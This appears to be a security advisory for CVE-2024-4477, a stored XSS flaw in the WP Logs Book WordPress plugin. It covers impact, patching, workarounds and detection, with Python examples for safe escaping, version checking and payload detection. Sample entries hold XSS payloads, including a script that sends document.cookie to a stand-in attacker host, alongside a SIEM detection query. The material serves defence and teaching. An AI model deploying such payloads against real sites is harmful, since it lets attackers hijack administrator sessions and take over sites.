CVE-2024-4477

5.4 MEDIUM

📋 TL;DR

CVE-2024-4477 is an unauthenticated stored cross-site scripting (XSS) vulnerability in the WP Logs Book WordPress plugin. Attackers can inject malicious scripts into log entries that execute when administrators view the plugin's dashboard. This affects all WordPress sites using vulnerable versions of the WP Logs Book plugin.

💻 Affected Systems

Products:
  • WP Logs Book WordPress Plugin
Versions: through 1.0.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects WordPress installations with the WP Logs Book plugin installed and activated.

⚠️ Risk & Real-World Impact

🔴 Worst Case

The injected script runs in the browser of whichever administrator opens the log dashboard, with that administrator's session. WordPress sets its authentication cookies HttpOnly by default, so reading them from document.cookie is unlikely to work; the realistic worst case is the script issuing requests as the administrator (creating a new administrator account, installing a backdoored plugin, editing theme files) or redirecting users to malicious sites.

🟠 Likely Case

An attacker plants JavaScript in a logged field, waits for an administrator to view the plugin's log page, and uses the administrator's session to perform privileged actions, typically leading to full site compromise.

🟢 If Mitigated

With output escaping applied wherever logged fields are rendered (in WordPress, esc_html() for element content and esc_attr() for attribute values), injected markup is displayed as literal text rather than executed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: LOW
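To make the "If Mitigated" point concrete, here is an added illustration (not code from the WP Logs Book plugin) of the bug class and its fix: a mock log-row renderer that interpolates attacker-controlled fields verbatim, beside one that escapes per output context. The entry shape, field names and payloads are constructed for the example; Python's html.escape stands in for WordPress esc_html()/esc_attr().

```python
import html

# Constructed sample log entry with XSS payloads in user-controlled fields.
# The field names are an assumption for illustration, not the plugin's schema.
INJECTED_ENTRY = {
    "username": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "user_agent": 'Mozilla/5.0" onmouseover="alert(1)',
    "ip": "203.0.113.5",
}


def render_row_unsafe(entry):
    """Vulnerable pattern: logged values dropped straight into HTML.

    This mirrors the class of defect in the advisory (attacker data reaches the
    admin page unescaped). The username lands in element content, the user agent
    in an attribute, so each needs context-appropriate escaping.
    """
    return (
        f'<tr title="{entry["user_agent"]}">'
        f'<td>{entry["username"]}</td><td>{entry["ip"]}</td></tr>'
    )


def render_row_safe(entry):
    """Hardened pattern: escape at output time.

    html.escape(quote=True) converts <, >, &, " and ', which covers both element
    content and double-quoted attribute values; in WordPress the equivalents are
    esc_html() and esc_attr().
    """
    return (
        f'<tr title="{html.escape(entry["user_agent"], quote=True)}">'
        f'<td>{html.escape(entry["username"], quote=True)}</td>'
        f'<td>{html.escape(entry["ip"], quote=True)}</td></tr>'
    )


def contains_active_markup(rendered):
    """Crude demonstration check: is a live <script> tag or an injected
    attribute boundary still present in the rendered HTML?"""
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover="' in lowered


if __name__ == "__main__":
    print("unsafe:", render_row_unsafe(INJECTED_ENTRY))
    print("safe:  ", render_row_safe(INJECTED_ENTRY))
```

Running it shows the unsafe row carrying a live script tag and a broken-out attribute, while the safe row carries the same payloads as inert `&lt;script&gt;` and `&quot;` text. The lesson for any plugin that echoes stored data to an admin page is to escape at the point of output, for the exact HTML context the value lands in, rather than trusting that input filtering happened earlier.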

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires no authentication and involves simple script injection into log data fields.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.2 or later

Advisory (WPScan): https://wpscan.com/vulnerability/ab551552-944c-4e2a-9355-7011cbe553b0/

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the WP Logs Book plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 1.0.2 or later from the WordPress plugin repository and replace the plugin files.

🔧 Temporary Workarounds

Disable WP Logs Book Plugin (applies to: all platforms)

Temporarily deactivate the vulnerable plugin until it is patched. Deactivation stops the plugin's dashboard from rendering stored entries to administrators.

wp plugin deactivate wp-logs-book

Restrict Admin Dashboard Access (applies to: all platforms)

Limit access to the WordPress admin dashboard to trusted IP addresses only. Note the limits of this control: the stored script still executes in a legitimate administrator's browser, which is already on a trusted address. IP restriction only narrows what an attacker can do from elsewhere with any credentials they obtain.

🧯 If You Can't Patch

  • Disable the WP Logs Book plugin immediately.
  • Implement web application firewall (WAF) rules to block XSS payloads aimed at the data the plugin logs. Treat this as a stopgap only: signature rules match known forms of a payload, and URL-encoded, case-varied or event-handler-based variants routinely slip past them.

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Installed Plugins for WP Logs Book version. If version is 1.0.1 or earlier, you are vulnerable.

Check Version:

wp plugin get wp-logs-book --field=version

Verify Fix Applied:

After updating, verify WP Logs Book plugin version is 1.0.2 or later in WordPress admin plugins page.
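When wp-cli is not available (shared hosting, an offline backup, a forensic disk image), the version can be read from the plugin's main file header, which WordPress itself parses from the first 8 KiB of the file. The following is an added example, not tooling from the page or the plugin; the sample header text is constructed, and the header parsing follows the standard WordPress plugin-header format.

```python
import re
from pathlib import Path

# Constructed sample of a WordPress plugin main-file header (field values are
# illustrative; the real file has more fields).
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: WP Logs Book
 * Description: Keeps a log of site activity.
 * Version: 1.0.1
 */
"""

# First version reported as fixed by this page.
FIXED_VERSION = (1, 0, 2)

# WordPress reads plugin headers from the first 8 KiB of the file.
HEADER_BYTES = 8192


def parse_plugin_version(header_text):
    """Return the 'Version:' header value, or None if absent."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", header_text, re.MULTILINE)
    return m.group(1) if m else None


def version_tuple(version_str):
    """'1.0.1' -> (1, 0, 1). Non-numeric suffixes such as '1.0.2-beta' are
    truncated at the first non-digit component (an assumption for comparison)."""
    parts = []
    for piece in version_str.split("."):
        digits = re.match(r"\d+", piece)
        if not digits:
            break
        parts.append(int(digits.group()))
    return tuple(parts)


def is_vulnerable(version_str):
    """True when the installed version is below the first fixed version."""
    return version_tuple(version_str) < FIXED_VERSION


def check_plugins_dir(plugins_dir):
    """Scan wp-content/plugins/*/*.php for the WP Logs Book header.

    Returns {path: (version, vulnerable)} for each matching main file.
    """
    results = {}
    for main_file in Path(plugins_dir).glob("*/*.php"):
        text = main_file.read_text(errors="ignore")[:HEADER_BYTES]
        if re.search(r"^\s*\*?\s*Plugin Name:\s*WP Logs Book\s*$", text,
                     re.MULTILINE | re.IGNORECASE):
            version = parse_plugin_version(text)
            results[str(main_file)] = (
                version,
                version is not None and is_vulnerable(version),
            )
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "wp-content/plugins"
    for path, (version, vulnerable) in check_plugins_dir(target).items():
        print(f"{path}: version {version} -> {'VULNERABLE' if vulnerable else 'ok'}")
```

Run it with the path to the site's `wp-content/plugins` directory. A header version that is missing or unparsable is reported as not-vulnerable by this script only because it cannot decide; treat such a result as "inspect by hand", not as a clean bill of health.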

📡 Detection & Monitoring

Log Indicators:

  • Unusual log entries containing script tags or JavaScript code in WP Logs Book logs
  • Multiple failed login attempts followed by successful admin login from new IP

Network Indicators:

  • HTTP POST requests to wp-logs-book endpoints containing script tags or JavaScript payloads

SIEM Query:

source="wordpress" AND (uri_path="*wp-logs-book*" AND (http_method="POST" AND (content="*<script>*" OR content="*javascript:*" OR content="*%3Cscript*" OR content="*onerror=*")))

This literal match is a starting point, not a complete detection: payloads are commonly URL-encoded (sometimes twice) or use tags other than <script>, so pair it with a normalising check over the stored log entries themselves.
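The literal SIEM match above misses payloads that arrive percent-encoded or that avoid the `<script>` tag entirely. The following added detector (not part of the page or any product) normalises candidate strings by bounded repeated percent-decoding before applying a small set of XSS patterns, so it can be run over captured request bodies or over the plugin's stored entries exported from the database. All sample inputs are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request bodies / stored log values (label, text).
SAMPLES = [
    ("plain", "log=wp_login&user=alice&ua=Mozilla/5.0"),
    ("script_tag", "user=<script>alert(1)</script>"),
    ("url_encoded", "user=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"),
    ("mixed_case", "user=<ScRiPt src=//evil.example/x.js></ScRiPt>"),
    ("event_handler", "ua=<img src=x onerror=fetch('//evil.example')>"),
    ("js_uri", "ua=<a href=javascript:alert(1)>x</a>"),
    ("double_encoded", "user=%253Cscript%253E"),
]

# Pattern names double as the indicator category reported to the analyst.
PATTERNS = [
    ("script_tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
    # Event handler attribute inside a tag; anchoring on '<' avoids matching
    # harmless query parameters such as 'one=1'.
    ("event_handler", re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)),
    ("js_uri", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("active_embed", re.compile(r"<\s*(svg|iframe|object|embed)\b", re.IGNORECASE)),
]


def normalise(text, rounds=3):
    """Percent-decode repeatedly, bounded, so single- and double-encoded
    payloads are inspected in the form the browser would finally see."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def detect_xss(text):
    """Return the names of all patterns that match after normalisation."""
    candidate = normalise(text)
    return [name for name, rx in PATTERNS if rx.search(candidate)]


def scan(samples):
    """Map each sample label to the indicator categories found in it."""
    return {label: detect_xss(text) for label, text in samples}


if __name__ == "__main__":
    for label, hits in scan(SAMPLES).items():
        print(f"{label:15s} -> {hits or 'clean'}")
```

Of the seven samples, a plain `*<script>*` string match flags only the first script-tag case; the decoder and the extra patterns catch the encoded, double-encoded, event-handler and javascript: variants as well. Feed it the values stored by the plugin, not just the inbound requests: for a stored XSS the database row is the ground truth of what will render to an administrator.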
